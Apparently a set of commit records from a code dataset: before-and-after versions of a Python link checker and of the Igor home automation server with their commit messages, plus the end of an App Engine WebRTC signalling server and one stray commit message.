if len(client_map) > 0:
other_client = client_map.values()[0]
# Set other client to be new initiator.
other_client.is_initiator = True
# This should already be empty, but set it anyway.
other_client.messages = []
# Commit changes.
other_client.put()
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MessagePage(webapp2.RequestHandler):
def write_response(self, result):
content = json.dumps({ 'result' : result })
self.response.write(content)
def send_message_to_collider(self, room_id, client_id, message):
logging.info('Forwarding message to collider for room ' + room_id +
' client ' + client_id)
wss_url, wss_post_url = get_wss_parameters(self.request)
url = wss_post_url + '/' + room_id + '/' + client_id
result = urlfetch.fetch(url=url,
payload=message,
method=urlfetch.POST)
if result.status_code != 200:
logging.error(
'Failed to send message to collider: %d' % (result.status_code))
# TODO(tkchin): better error handling.
self.error(500)
return
self.write_response('SUCCESS')
def post(self, room_id, client_id):
message_json = self.request.body
with LOCK:
client_map = get_room_client_map(room_id)
occupancy = len(client_map)
# Check that room exists.
if occupancy == 0:
logging.warning('Unknown room: ' + room_id)
self.write_response('UNKNOWN_ROOM')
return
# Check that client is registered.
if not client_id in client_map:
logging.warning('Unknown client: ' + client_id)
self.write_response('UNKNOWN_CLIENT')
return
# Check if other client is registered.
if occupancy == 1:
# No other client registered, save message.
logging.info('Saving message from client ' + client_id +
' for room ' + room_id)
client = client_map[client_id]
text = db.Text(message_json, encoding='utf-8')
client.messages.append(text)
client.put()
self.write_response('SUCCESS')
return
# Other client registered, forward to collider. Do this outside the lock.
# Note: this may fail in local dev server due to not having the right
# certificate file locally for SSL validation.
# Note: loopback scenario follows this code path.
# TODO(tkchin): consider async fetch here.
self.send_message_to_collider(room_id, client_id, message_json)
class RegisterPage(webapp2.RequestHandler):
def write_response(self, result, params, messages):
# TODO(tkchin): Clean up response format. For simplicity put everything in
# params for now.
params['messages'] = messages
self.response.write(json.dumps({
'result': result,
'params': params
}))
def write_room_parameters(self, room_id, client_id, messages, is_initiator):
params = get_room_parameters(self.request, room_id, client_id, is_initiator)
self.write_response('SUCCESS', params, messages)
def post(self, room_id):
client_id = generate_random(8)
is_loopback = self.request.get('debug') == 'loopback'
is_initiator = False
messages = []
params = {}
with LOCK:
client_map = get_room_client_map(room_id)
occupancy = len(client_map)
if occupancy == 0:
# New room.
# Create first client as initiator.
is_initiator = True
add_client(client_map, room_id, client_id, messages, is_initiator)
if is_loopback:
add_client(
client_map, room_id, LOOPBACK_CLIENT_ID, messages, False)
# Write room parameters response.
self.write_room_parameters(room_id, client_id, messages, is_initiator)
elif occupancy == 1:
# Retrieve stored messages from first client.
other_client = client_map.values()[0]
messages = other_client.messages
# Create second client as not initiator.
is_initiator = False
add_client(client_map, room_id, client_id, [], is_initiator)
# Write room parameters response with any messages.
self.write_room_parameters(room_id, client_id, messages, is_initiator)
# Delete the messages we've responded with.
other_client.messages = []
other_client.put()
elif occupancy >= 2:
# Full room.
logging.info('Room ' + room_id + ' is full.')
self.write_response('FULL', params, messages)
return
logging.info('User ' + client_id + ' registered in room ' + room_id)
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MainPage(webapp2.RequestHandler):
def get(self):
"""Redirects to a room page."""
room_id = generate_random(8)
redirect = '/r/' + room_id
redirect = append_url_arguments(self.request, redirect)
self.redirect(redirect)
logging.info('Redirecting visitor to base URL to ' + redirect)
class RoomPage(webapp2.RequestHandler):
def write_response(self, target_page, params={}):
template = jinja_environment.get_template(target_page)
content = template.render(params)
self.response.out.write(content)
def get(self, room_id):
"""Renders index.html or full.html."""
# Check if room is full.
with LOCK:
client_map = get_room_client_map(room_id)
logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
if len(client_map) >= 2:
logging.info('Room ' + room_id + ' is full')
self.write_response('full.html')
return
# Parse out room parameters from request.
params = get_room_parameters(self.request, room_id, None, None)
self.write_response('index.html', params)
app = webapp2.WSGIApplication([
('/', MainPage),
('/bye/(\w+)/(\w+)', ByePage),
('/message/(\w+)/(\w+)', MessagePage),
('/register/(\w+)', RegisterPage),
# TODO(jiayl): Remove support of /room/ when all clients are updated.
('/room/(\w+)', RoomPage),
('/r/(\w+)', RoomPage),
], debug=True)
|
#!/usr/bin/env python3
import os
import sys
import http.server
from threading import Event, Thread, Condition, \
BoundedSemaphore
from contextlib import suppress
from urllib.parse import urljoin, urlsplit
import requests
from lxml import etree
from lxml.cssselect import CSSSelector
DEBUG = False
class LinkChecker(object):
def __init__(self, start_urls):
# urls are SCHEME://NETLOC/PATH
self.recursive_netlocs = set(urlsplit(u).netloc for u in start_urls)
# key: url, value: referers
self.referers = dict((u, set(['commandline'])) for u in start_urls)
# key: url, value: http response code
self.visited = dict()
self.queued = set(start_urls)
self.ignored = set()
self.cv = Condition()
self.waiting = 0
self.num_workers = 0
self.done = Event()
def link_extractor(self, html, url):
img_selector = CSSSelector('img')
a_selector = CSSSelector('a')
def urls_generator():
for img in img_selector(html):
with suppress(KeyError):
yield urljoin(url, img.attrib['src'])
with suppress(KeyError):
yield urljoin(url, img.attrib['data-src'])
for a in a_selector(html):
with suppress(KeyError):
yield urljoin(url, a.attrib['href'])
return set(urls_generator())
def process_queued_urls(self, idx):
id = "Thread {}:".format(idx)
while True:
with self.cv:
try:
url = self.queued.pop()
except KeyError:
if DEBUG:
print(id, "waiting...")
self.waiting += 1
if self.num_workers == self.waiting:
# every thread is waiting => done
self.done.set()
self.cv.notify_all()
if DEBUG:
print(id, "done")
return
else:
self.cv.wait()
self.waiting -= 1
continue
if DEBUG:
print(id, url)
r = requests.get(url)
with self.cv:
self.visited[url] = r.status_code
if r.status_code == 200 and \
r.headers['content-type'].startswith('text/html') and \
urlsplit(url).netloc in self.recursive_netlocs:
for found_url in self.link_extractor(etree.HTML(r.content), url):
if urlsplit(found_url).scheme not in ['http', 'https']:
continue
try:
self.referers[found_url].add(url)
# no KeyError? => we've already seen this one
except KeyError:
self.referers[found_url] = set([url])
self.queued.add(found_url)
self.cv.notify()
def run(self, num_workers):
threadpool = [Thread(target=self.process_queued_urls, args=(i,), daemon=False)
for i in range(num_workers)]
self.waiting = 0
self.num_workers = num_workers
self.done.clear()
[t.start() for t in threadpool]
[t.join() for t in threadpool]
if __name__ == '__main__':
urls = sys.argv[1:]
local_server_thread = None
if len(urls) == 0:
print('checking links in files found in current directory')
for r, _, files in os.walk('.'):
for f in files:
f = os.path.join(r, f)
if f.startswith('./'):
f = f[2:]
if f.endswith('index.html'):
f = f[:-len('index.html')]
urls.append('http://127.0.0.1:8000/' + f)
local_server_thread = Thread(
target=lambda: http.server.test(
HandlerClass=http.server.SimpleHTTPRequestHandler,
bind="127.0.0.1"
),
)
local_server_thread.start()
link_checker = LinkChecker(urls)
link_checker.run(1 if local_server_thread else 10)
print("checked {} urls, {} returned errors.".format(
len(link_checker.visited),
[code >= 400 for code in link_checker.visited.values()].count(True)
))
for url, code in sorted(link_checker.visited.items(), key=lambda e: e[0]):
if code >= 400:
print("{}: {}\nFound on:".format(code, url))
for ref in link_checker.referers[url]:
print(" {}".format(ref))
if any(code >= 400 for code in link_checker.visited.values()):
sys.exit(1)
use a daemon thread for the internal http server + enable multithreading again
link_checker.py never exists with a non-daemon thread handling the internal webserver used to find dead links in files.
I thought multithreading was a problem, but it turns out it's not. That's why it's enabled in all cases again.
#!/usr/bin/env python3
import os
import sys
import http.server
from threading import Event, Thread, Condition, \
BoundedSemaphore
from contextlib import suppress
from urllib.parse import urljoin, urlsplit
import requests
from lxml import etree
from lxml.cssselect import CSSSelector
DEBUG = False
class LinkChecker(object):
def __init__(self, start_urls):
# urls are SCHEME://NETLOC/PATH
self.recursive_netlocs = set(urlsplit(u).netloc for u in start_urls)
# key: url, value: referers
self.referers = dict((u, set(['commandline'])) for u in start_urls)
# key: url, value: http response code
self.visited = dict()
self.queued = set(start_urls)
self.ignored = set()
self.cv = Condition()
self.waiting = 0
self.num_workers = 0
self.done = Event()
def link_extractor(self, html, url):
img_selector = CSSSelector('img')
a_selector = CSSSelector('a')
def urls_generator():
for img in img_selector(html):
with suppress(KeyError):
yield urljoin(url, img.attrib['src'])
with suppress(KeyError):
yield urljoin(url, img.attrib['data-src'])
for a in a_selector(html):
with suppress(KeyError):
yield urljoin(url, a.attrib['href'])
return set(urls_generator())
def process_queued_urls(self, idx):
id = "Thread {}:".format(idx)
while True:
with self.cv:
try:
url = self.queued.pop()
except KeyError:
if DEBUG:
print(id, "waiting...")
self.waiting += 1
if self.num_workers == self.waiting:
# every thread is waiting => done
self.done.set()
self.cv.notify_all()
if DEBUG:
print(id, "done")
return
else:
self.cv.wait()
self.waiting -= 1
continue
if DEBUG:
print(id, url)
r = requests.get(url)
with self.cv:
self.visited[url] = r.status_code
if r.status_code == 200 and \
r.headers['content-type'].startswith('text/html') and \
urlsplit(url).netloc in self.recursive_netlocs:
for found_url in self.link_extractor(etree.HTML(r.content), url):
if urlsplit(found_url).scheme not in ['http', 'https']:
continue
try:
self.referers[found_url].add(url)
# no KeyError? => we've already seen this one
except KeyError:
self.referers[found_url] = set([url])
self.queued.add(found_url)
self.cv.notify()
def run(self, num_workers):
threadpool = [Thread(target=self.process_queued_urls, args=(i,), daemon=False)
for i in range(num_workers)]
self.waiting = 0
self.num_workers = num_workers
self.done.clear()
[t.start() for t in threadpool]
[t.join() for t in threadpool]
if __name__ == '__main__':
urls = sys.argv[1:]
local_server_thread = None
if len(urls) == 0:
print('checking links in files found in current directory')
for r, _, files in os.walk('.'):
for f in files:
f = os.path.join(r, f)
if f.startswith('./'):
f = f[2:]
if f.endswith('index.html'):
f = f[:-len('index.html')]
urls.append('http://127.0.0.1:8000/' + f)
local_server_thread = Thread(
target=lambda: http.server.test(
HandlerClass=http.server.SimpleHTTPRequestHandler,
bind="127.0.0.1"
),
daemon=True
)
local_server_thread.start()
link_checker = LinkChecker(urls)
link_checker.run(10)
print("checked {} urls, {} returned errors.".format(
len(link_checker.visited),
[code >= 400 for code in link_checker.visited.values()].count(True)
))
for url, code in sorted(link_checker.visited.items(), key=lambda e: e[0]):
if code >= 400:
print("{}: {}\nFound on:".format(code, url))
for ref in link_checker.referers[url]:
print(" {}".format(ref))
if any(code >= 400 for code in link_checker.visited.values()):
sys.exit(1)
|
make load generator configurable for perf test (#879)
* make load generator configurable for perf test
* extract gen_test_labels gen_headers_cmd and gen_fortio_cmd funcs
* make func name much more readable
* remove never used rc() func
* move up kubectl related helpers
* move duration to fortio cmd func
* fix lint error
|
import webApp
import xmlDatabase
import actions
import sseListener
import callUrl
import os
import argparse
import besthostname
import time
import json
import web
import subprocess
import imp
import threading
import cProfile
import pstats
import myLogger
from _version import VERSION
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#
# Helper for profileing multiple threads
#
PROFILER_STATS = None
def enable_thread_profiling():
'''Monkey-patch Thread.run to enable global profiling.
Each thread creates a local profiler; statistics are pooled
to the global stats object on run completion.'''
global PROFILER_STATS
import pstats
PROFILER_STATS = None
thread_run = threading.Thread.run
def profile_run(self):
print 'xxxjack profile_run'
self._prof = cProfile.Profile()
self._prof.enable()
thread_run(self)
self._prof.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self._prof)
else:
PROFILER_STATS.add(self._prof)
threading.Thread.run = profile_run
print 'xxxjack inserted profiler'
class IgorServer:
def __init__(self, datadir, port=9333, advertise=False, profile=False):
#
# Create the database, and tell the web application about it
#
self.profile = None
if profile:
enable_thread_profiling()
self.profile = cProfile.Profile()
self.profile.enable()
self.port = port
self.app = webApp.WEBAPP
self.datadir = datadir
self.database = xmlDatabase.DBImpl(os.path.join(self.datadir, 'database.xml'))
webApp.DATABASE = self.database # Have to set in a module-global variable, to be fixed some time...
webApp.SCRIPTDIR = os.path.join(datadir, 'scripts')
webApp.PLUGINDIR = os.path.join(datadir, 'plugins')
webApp.STATICDIR = os.path.join(datadir, 'static')
webApp.COMMANDS = self
#
# Create and start the asynchronous URL accessor
#
self.urlCaller = callUrl.URLCaller(self.app)
self.urlCaller.start()
#
# Fill self data
#
self.fillSelfData()
#
# Startup other components
#
self.actionHandler = None
self.updateActions()
self.eventSources = None
self.updateEventSources()
self.triggerHandler = None
self.updateTriggers()
#
# Disable debug
#
web.config.debug = False
#
# Send start action to start any plugins
#
self.urlCaller.callURL(dict(method='GET', url='/action/start'))
if advertise:
self.advertise(port)
def advertise(self, port):
if sys.platform == 'darwin':
cmd = ['dns-sd', '-R', 'igor', '_http._tcp', 'local', str(port)]
elif sys.platform == 'linux2':
cmd = ['avahi-publish', '-s', 'igor', '_http._tcp', str(port)]
else:
print >> sys.stderr, "Cannot do mdns-advertise on platform", sys.platform
return
try:
self.advertiser = subprocess.Popen(cmd)
except OSError:
print >> sys.stderr, "advertisement command failed: %s" % (' '.join(cmd))
def fillSelfData(self):
"""Put our details in the database"""
hostName = besthostname.besthostname()
url = 'http://%s:%d/data' % (hostName, self.port)
oldRebootCount = self.database.getValue('/data/services/igor/rebootCount')
rebootCount = 0
if oldRebootCount:
try:
rebootCount = int(oldRebootCount)+1
except ValueError:
pass
data = dict(host=hostName, url=url, port=self.port, startTime=int(time.time()), version=VERSION, ticker=0, rebootCount=rebootCount)
tocall = dict(method='PUT', url='/data/services/igor', mimetype='application/json', data=json.dumps(data), representing='igor/core')
self.urlCaller.callURL(tocall)
def run(self):
self.app.run(port=self.port)
def dump(self):
rv = ''
if self.urlCaller: rv += self.urlCaller.dump() + '\n'
if self.actionHandler: rv += self.actionHandler.dump() + '\n'
if self.eventSources: rv += self.eventSources.dump() + '\n'
return rv
def log(self):
logfn = os.path.join(self.datadir, 'igor.log')
if os.path.exists(logfn):
return open(logfn).read()
raise Web.HTTPError('404 Log file not available')
def updateStatus(self, subcommand=None, representing=None, alive=None, resultData=None, lastActivity=None, lastSuccess=None):
"""Update status field of some service/sensor/actuator after an action"""
if subcommand:
representing = subcommand
if representing.startswith('/data/'):
representing = representing[len('/data/'):]
if lastActivity == None:
lastActivity = time.time()
else:
lastActivity = float(lastActivity)
if lastSuccess == None and alive:
lastSuccess = lastActivity
# xxxjack this needs to be done differently. Too much spaghetti.
dbAccess = webApp.DATABASE_ACCESS
key = 'status/' + representing
# Check whether record exists, otherwise create it (empty)
try:
_ = dbAccess.get_key(key, 'application/x-python-object', 'content')
except web.HTTPError:
web.ctx.status = "200 OK" # Clear error, otherwise it is forwarded from this request
_ = dbAccess.put_key(key, 'application/x-python-object', None, '', 'text/plain')
# Fill only entries we want
_ = dbAccess.put_key(key + '/alive', 'application/x-python-object', None, not not alive, 'application/x-python-object')
_ = dbAccess.put_key(key + '/lastActivity', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
_ = dbAccess.put_key(key + '/lastSuccess', 'application/x-python-object', None, lastSuccess, 'application/x-python-object')
if alive:
_ = dbAccess.put_key(key + '/ignoreErrorsUntil', 'application/x-python-object', None, None, 'application/x-python-object')
resultData = ''
else:
_ = dbAccess.put_key(key + '/lastFailure', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
if not resultData:
resultData = '%s failed without error message' % representing
if type(resultData) == type({}):
for k, v in resultData.items():
_ = dbAccess.put_key(key + '/' + k, 'application/x-python-object', None, v, 'application/x-python-object')
else:
_ = dbAccess.put_key(key + '/errorMessage', 'application/x-python-object', None, resultData, 'application/x-python-object')
return ''
def updateActions(self):
"""Create any (periodic) event handlers defined in the database"""
startupActions = self.database.getElements('actions')
if len(startupActions):
if len(startupActions) > 1:
raise web.HTTPError('401 only one <actions> element allowed')
if not self.actionHandler:
self.actionHandler = actions.ActionCollection(self.database, self.urlCaller.callURL)
self.actionHandler.updateActions(startupActions[0])
elif self.actionHandler:
self.actionHandler.updateActions([])
return 'OK'
def updateEventSources(self):
"""Create any SSE event sources that are defined in the database"""
eventSources = self.database.getElements('eventSources')
if len(eventSources):
if len(eventSources) > 1:
raise web.HTTPError('401 only one <eventSources> element allowed')
if not self.eventSources:
self.eventSources = sseListener.EventSourceCollection(self.database, self.urlCaller.callURL)
self.eventSources.updateEventSources(eventSources[0])
elif self.eventSources:
self.eventSources.updateEventSources([])
return 'OK'
def updateTriggers(self):
pass
def runAction(self, actionname):
if not self.actionHandler:
raise web.notfound()
nodes = self.database.getElements('actions/action[name="%s"]'%actionname)
if not nodes:
raise web.notfound()
for node in nodes:
self.actionHandler.triggerAction(node)
return 'OK'
def runTrigger(self, triggername):
raise web.HTTPError("502 triggers not yet implemented")
if not self.triggerHandler:
raise web.notfound()
triggerNodes = self.database.getElements('triggers/%s' % triggername)
if not triggerNodes:
raise web.notfound()
if len(triggerNodes) > 1:
raise web.HTTPError("502 multiple triggers %s in database" % triggername)
triggerNode = triggerNodes[0]
self.triggerHandler.triggerTrigger(triggerNode)
def save(self):
"""Saves the database to the filesystem"""
self.database.saveFile()
return 'OK'
def queue(self, subcommand):
"""Queues an internal command through callUrl (used for save/stop/restart)"""
self.urlCaller.callURL(dict(method='GET', url='/internal/%s' % subcommand))
return 'OK'
def started(self):
return "IgorServer started"
def stop(self):
"""Exits igorServer after saving"""
global PROFILER_STATS
if self.actionHandler:
self.actionHandler.stop()
self.actionHandler = None
if self.eventSources:
self.eventSources.stop()
self.eventSources = None
if self.triggerHandler:
self.triggerHandler.stop()
self.triggerHandler = None
if self.urlCaller:
self.urlCaller.stop()
self.urlCaller = None
self.save()
if self.profile:
self.profile.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self.profile)
else:
PROFILER_STATS.add(self.profile)
PROFILER_STATS.dump_stats("igor.profile")
sys.exit(0)
def restart(self):
"""Saves the database and restarts igorServer"""
self.save()
os.closerange(3, subprocess.MAXFD)
os.execl(sys.executable, sys.executable, *sys.argv)
def command(self):
rv = ''
if 'IGORSERVER_DIR' in os.environ:
rv = rv + 'export IGORSERVER_DIR=' + repr(os.environ['IGORSERVER_DIR']) + '\n'
if 'IGORSERVER_PORT' in os.environ:
rv = rv + 'export IGORSERVER_PORT=%d\n' % int(os.environ['IGORSERVER_PORT'])
rv = rv + 'exec %s' % repr(sys.executable)
for a in sys.argv:
rv += ' ' + repr(a)
rv += '\n'
return rv
def help(self):
rv = 'Internal igor commands:\n'
rv += 'help - this help\n'
rv += 'version - return version number\n'
rv += 'save - Make sure database is saved to disk\n'
rv += 'restart - Save and restart this Igor (may appear to fail even when executed correctly)\n'
rv += 'stop - Save and stop this Igor (may appear to fail even when executed correctly)\n'
rv += 'command - Show command line that started this Igor instance\n'
rv += 'dump - Show internal run queue of this Igor instance\n'
rv += 'log - Show httpd-style log file of this Igor instance\n'
return rv
def version(self):
return VERSION + '\n'
def main():
DEFAULTDIR=os.path.join(os.path.expanduser('~'), '.igor')
if 'IGORSERVER_DIR' in os.environ:
DEFAULTDIR = os.environ['IGORSERVER_DIR']
DEFAULTPORT=9333
if 'IGORSERVER_PORT' in os.environ:
DEFAULTDIR = int(os.environ['IGORSERVER_PORT'])
parser = argparse.ArgumentParser(description="Run the Igor home automation server")
parser.add_argument("-d", "--database", metavar="DIR", help="Database and scripts are stored in DIR (default: %s, environment IGORSERVER_DIR)" % DEFAULTDIR, default=DEFAULTDIR)
parser.add_argument("-p", "--port", metavar="PORT", type=int, help="Port to serve on (default: 9333, environment IGORSERVER_PORT)", default=DEFAULTPORT)
parser.add_argument("--debug", action="store_true", help="Enable debug output")
parser.add_argument("--advertise", action="store_true", help="Advertise service through bonjour/zeroconf")
parser.add_argument("--version", action="store_true", help="Print version and exit")
parser.add_argument("--profile", action="store_true", help="Enable Python profiler (debugging Igor only)")
parser.add_argument('--logLevel', metavar='SPEC', help="Set log levels (comma-separated list of [loggername:]LOGLEVEL)")
args = parser.parse_args()
myLogger.install(args.logLevel)
if args.version:
print VERSION
sys.exit(0)
if args.debug:
callUrl.DEBUG = True
sseListener.DEBUG = True
actions.DEBUG = True
xmlDatabase.DEBUG = True
webApp.DEBUG = True
datadir = args.database
try:
igorServer = IgorServer(datadir, args.port, args.advertise, profile=args.profile)
except IOError, arg:
print >>sys.stderr, '%s: Cannot open database: %s' % (sys.argv[0], arg)
print >>sys.stderr, '%s: Use --help option to see command line arguments' % sys.argv[0]
sys.exit(1)
igorServer.run()
#
# We need to hack the import lock. In case we get here via the easy_install igorServer script
# we are inside an __import__(), and we hold the lock. This means other threads cannot import
# and we hang once a web request comes in. We "work around" this by releasing the lock.
#
hasImportLock = imp.lock_held()
if hasImportLock:
imp.release_lock()
main()
if hasImportLock:
imp.acquire_lock()
lastSuccess was always overwritten. Fixed.
import webApp
import xmlDatabase
import actions
import sseListener
import callUrl
import os
import argparse
import besthostname
import time
import json
import web
import subprocess
import imp
import threading
import cProfile
import pstats
import myLogger
from _version import VERSION
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#
# Helper for profileing multiple threads
#
PROFILER_STATS = None
def enable_thread_profiling():
'''Monkey-patch Thread.run to enable global profiling.
Each thread creates a local profiler; statistics are pooled
to the global stats object on run completion.'''
global PROFILER_STATS
import pstats
PROFILER_STATS = None
thread_run = threading.Thread.run
def profile_run(self):
print 'xxxjack profile_run'
self._prof = cProfile.Profile()
self._prof.enable()
thread_run(self)
self._prof.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self._prof)
else:
PROFILER_STATS.add(self._prof)
threading.Thread.run = profile_run
print 'xxxjack inserted profiler'
class IgorServer:
def __init__(self, datadir, port=9333, advertise=False, profile=False):
#
# Create the database, and tell the web application about it
#
self.profile = None
if profile:
enable_thread_profiling()
self.profile = cProfile.Profile()
self.profile.enable()
self.port = port
self.app = webApp.WEBAPP
self.datadir = datadir
self.database = xmlDatabase.DBImpl(os.path.join(self.datadir, 'database.xml'))
webApp.DATABASE = self.database # Have to set in a module-global variable, to be fixed some time...
webApp.SCRIPTDIR = os.path.join(datadir, 'scripts')
webApp.PLUGINDIR = os.path.join(datadir, 'plugins')
webApp.STATICDIR = os.path.join(datadir, 'static')
webApp.COMMANDS = self
#
# Create and start the asynchronous URL accessor
#
self.urlCaller = callUrl.URLCaller(self.app)
self.urlCaller.start()
#
# Fill self data
#
self.fillSelfData()
#
# Startup other components
#
self.actionHandler = None
self.updateActions()
self.eventSources = None
self.updateEventSources()
self.triggerHandler = None
self.updateTriggers()
#
# Disable debug
#
web.config.debug = False
#
# Send start action to start any plugins
#
self.urlCaller.callURL(dict(method='GET', url='/action/start'))
if advertise:
self.advertise(port)
def advertise(self, port):
if sys.platform == 'darwin':
cmd = ['dns-sd', '-R', 'igor', '_http._tcp', 'local', str(port)]
elif sys.platform == 'linux2':
cmd = ['avahi-publish', '-s', 'igor', '_http._tcp', str(port)]
else:
print >> sys.stderr, "Cannot do mdns-advertise on platform", sys.platform
return
try:
self.advertiser = subprocess.Popen(cmd)
except OSError:
print >> sys.stderr, "advertisement command failed: %s" % (' '.join(cmd))
def fillSelfData(self):
"""Put our details in the database"""
hostName = besthostname.besthostname()
url = 'http://%s:%d/data' % (hostName, self.port)
oldRebootCount = self.database.getValue('/data/services/igor/rebootCount')
rebootCount = 0
if oldRebootCount:
try:
rebootCount = int(oldRebootCount)+1
except ValueError:
pass
data = dict(host=hostName, url=url, port=self.port, startTime=int(time.time()), version=VERSION, ticker=0, rebootCount=rebootCount)
tocall = dict(method='PUT', url='/data/services/igor', mimetype='application/json', data=json.dumps(data), representing='igor/core')
self.urlCaller.callURL(tocall)
def run(self):
self.app.run(port=self.port)
def dump(self):
rv = ''
if self.urlCaller: rv += self.urlCaller.dump() + '\n'
if self.actionHandler: rv += self.actionHandler.dump() + '\n'
if self.eventSources: rv += self.eventSources.dump() + '\n'
return rv
def log(self):
logfn = os.path.join(self.datadir, 'igor.log')
if os.path.exists(logfn):
return open(logfn).read()
raise Web.HTTPError('404 Log file not available')
def updateStatus(self, subcommand=None, representing=None, alive=None, resultData=None, lastActivity=None, lastSuccess=None):
"""Update status field of some service/sensor/actuator after an action"""
if subcommand:
representing = subcommand
if representing.startswith('/data/'):
representing = representing[len('/data/'):]
if lastActivity == None:
lastActivity = time.time()
else:
lastActivity = float(lastActivity)
if lastSuccess == None and alive:
lastSuccess = lastActivity
# xxxjack this needs to be done differently. Too much spaghetti.
dbAccess = webApp.DATABASE_ACCESS
key = 'status/' + representing
# Check whether record exists, otherwise create it (empty)
try:
_ = dbAccess.get_key(key, 'application/x-python-object', 'content')
except web.HTTPError:
web.ctx.status = "200 OK" # Clear error, otherwise it is forwarded from this request
_ = dbAccess.put_key(key, 'application/x-python-object', None, '', 'text/plain')
# Fill only entries we want
_ = dbAccess.put_key(key + '/alive', 'application/x-python-object', None, not not alive, 'application/x-python-object')
_ = dbAccess.put_key(key + '/lastActivity', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
if lastSuccess:
_ = dbAccess.put_key(key + '/lastSuccess', 'application/x-python-object', None, lastSuccess, 'application/x-python-object')
if alive:
_ = dbAccess.put_key(key + '/ignoreErrorsUntil', 'application/x-python-object', None, None, 'application/x-python-object')
resultData = ''
else:
_ = dbAccess.put_key(key + '/lastFailure', 'application/x-python-object', None, lastActivity, 'application/x-python-object')
if not resultData:
resultData = '%s failed without error message' % representing
if type(resultData) == type({}):
for k, v in resultData.items():
_ = dbAccess.put_key(key + '/' + k, 'application/x-python-object', None, v, 'application/x-python-object')
else:
_ = dbAccess.put_key(key + '/errorMessage', 'application/x-python-object', None, resultData, 'application/x-python-object')
return ''
def updateActions(self):
"""Create any (periodic) event handlers defined in the database"""
startupActions = self.database.getElements('actions')
if len(startupActions):
if len(startupActions) > 1:
raise web.HTTPError('401 only one <actions> element allowed')
if not self.actionHandler:
self.actionHandler = actions.ActionCollection(self.database, self.urlCaller.callURL)
self.actionHandler.updateActions(startupActions[0])
elif self.actionHandler:
self.actionHandler.updateActions([])
return 'OK'
def updateEventSources(self):
"""Create any SSE event sources that are defined in the database"""
eventSources = self.database.getElements('eventSources')
if len(eventSources):
if len(eventSources) > 1:
raise web.HTTPError('401 only one <eventSources> element allowed')
if not self.eventSources:
self.eventSources = sseListener.EventSourceCollection(self.database, self.urlCaller.callURL)
self.eventSources.updateEventSources(eventSources[0])
elif self.eventSources:
self.eventSources.updateEventSources([])
return 'OK'
def updateTriggers(self):
pass
def runAction(self, actionname):
if not self.actionHandler:
raise web.notfound()
nodes = self.database.getElements('actions/action[name="%s"]'%actionname)
if not nodes:
raise web.notfound()
for node in nodes:
self.actionHandler.triggerAction(node)
return 'OK'
def runTrigger(self, triggername):
raise web.HTTPError("502 triggers not yet implemented")
if not self.triggerHandler:
raise web.notfound()
triggerNodes = self.database.getElements('triggers/%s' % triggername)
if not triggerNodes:
raise web.notfound()
if len(triggerNodes) > 1:
raise web.HTTPError("502 multiple triggers %s in database" % triggername)
triggerNode = triggerNodes[0]
self.triggerHandler.triggerTrigger(triggerNode)
def save(self):
"""Saves the database to the filesystem"""
self.database.saveFile()
return 'OK'
def queue(self, subcommand):
"""Queues an internal command through callUrl (used for save/stop/restart)"""
self.urlCaller.callURL(dict(method='GET', url='/internal/%s' % subcommand))
return 'OK'
def started(self):
return "IgorServer started"
def stop(self):
"""Exits igorServer after saving"""
global PROFILER_STATS
if self.actionHandler:
self.actionHandler.stop()
self.actionHandler = None
if self.eventSources:
self.eventSources.stop()
self.eventSources = None
if self.triggerHandler:
self.triggerHandler.stop()
self.triggerHandler = None
if self.urlCaller:
self.urlCaller.stop()
self.urlCaller = None
self.save()
if self.profile:
self.profile.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self.profile)
else:
PROFILER_STATS.add(self.profile)
PROFILER_STATS.dump_stats("igor.profile")
sys.exit(0)
def restart(self):
"""Saves the database and restarts igorServer"""
self.save()
os.closerange(3, subprocess.MAXFD)
os.execl(sys.executable, sys.executable, *sys.argv)
def command(self):
rv = ''
if 'IGORSERVER_DIR' in os.environ:
rv = rv + 'export IGORSERVER_DIR=' + repr(os.environ['IGORSERVER_DIR']) + '\n'
if 'IGORSERVER_PORT' in os.environ:
rv = rv + 'export IGORSERVER_PORT=%d\n' % int(os.environ['IGORSERVER_PORT'])
rv = rv + 'exec %s' % repr(sys.executable)
for a in sys.argv:
rv += ' ' + repr(a)
rv += '\n'
return rv
def help(self):
rv = 'Internal igor commands:\n'
rv += 'help - this help\n'
rv += 'version - return version number\n'
rv += 'save - Make sure database is saved to disk\n'
rv += 'restart - Save and restart this Igor (may appear to fail even when executed correctly)\n'
rv += 'stop - Save and stop this Igor (may appear to fail even when executed correctly)\n'
rv += 'command - Show command line that started this Igor instance\n'
rv += 'dump - Show internal run queue of this Igor instance\n'
rv += 'log - Show httpd-style log file of this Igor instance\n'
return rv
def version(self):
return VERSION + '\n'
def main():
DEFAULTDIR=os.path.join(os.path.expanduser('~'), '.igor')
if 'IGORSERVER_DIR' in os.environ:
DEFAULTDIR = os.environ['IGORSERVER_DIR']
DEFAULTPORT=9333
if 'IGORSERVER_PORT' in os.environ:
DEFAULTDIR = int(os.environ['IGORSERVER_PORT'])
parser = argparse.ArgumentParser(description="Run the Igor home automation server")
parser.add_argument("-d", "--database", metavar="DIR", help="Database and scripts are stored in DIR (default: %s, environment IGORSERVER_DIR)" % DEFAULTDIR, default=DEFAULTDIR)
parser.add_argument("-p", "--port", metavar="PORT", type=int, help="Port to serve on (default: 9333, environment IGORSERVER_PORT)", default=DEFAULTPORT)
parser.add_argument("--debug", action="store_true", help="Enable debug output")
parser.add_argument("--advertise", action="store_true", help="Advertise service through bonjour/zeroconf")
parser.add_argument("--version", action="store_true", help="Print version and exit")
parser.add_argument("--profile", action="store_true", help="Enable Python profiler (debugging Igor only)")
parser.add_argument('--logLevel', metavar='SPEC', help="Set log levels (comma-separated list of [loggername:]LOGLEVEL)")
args = parser.parse_args()
myLogger.install(args.logLevel)
if args.version:
print VERSION
sys.exit(0)
if args.debug:
callUrl.DEBUG = True
sseListener.DEBUG = True
actions.DEBUG = True
